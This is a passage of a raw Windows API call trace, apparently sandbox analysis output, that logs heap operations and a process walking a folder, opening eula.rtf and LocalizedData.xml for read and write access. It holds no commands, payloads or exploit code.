[0061.054] SetLastError (dwErrCode=0x5) [0061.054] GetLastError () returned 0x5 [0061.054] SetLastError (dwErrCode=0x5) [0061.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.054] AreFileApisANSI () returned 1 [0061.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042") returned 27 [0061.054] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042" (normalized: "c:\\588bce7c90097ed212\\1042"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.054] GetLastError () returned 0x5 [0061.054] GetLastError () returned 0x5 [0061.054] SetLastError (dwErrCode=0x5) [0061.054] GetLastError () returned 0x5 [0061.054] SetLastError (dwErrCode=0x5) [0061.054] GetLastError () returned 0x5 [0061.054] SetLastError (dwErrCode=0x5) [0061.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.054] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.054] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.054] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.055] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.055] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1043", cAlternateFileName="")) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.055] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.055] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.055] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0061.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0061.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0061.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.056] AreFileApisANSI () returned 1 [0061.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.056] AreFileApisANSI () returned 1 [0061.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0061.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0061.056] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.057] GetFileType (hFile=0x428) returned 0x1 [0061.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0061.057] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.057] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.057] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.057] CloseHandle (hObject=0x428) returned 1 [0061.057] AreFileApisANSI () returned 1 [0061.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0061.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0061.058] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.058] GetFileType (hFile=0x428) returned 0x1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.058] CloseHandle (hObject=0x428) returned 1 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.059] AreFileApisANSI () returned 1 [0061.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0061.059] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f)) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.059] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.060] AreFileApisANSI () returned 1 [0061.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.060] AreFileApisANSI () returned 1 [0061.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0061.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0061.060] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.061] GetFileType (hFile=0x428) returned 0x1 [0061.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.061] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.061] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.061] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.061] CloseHandle (hObject=0x428) returned 1 [0061.061] AreFileApisANSI () returned 1 [0061.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0061.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0061.062] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.062] GetFileType (hFile=0x428) returned 0x1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.062] CloseHandle (hObject=0x428) returned 1 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, 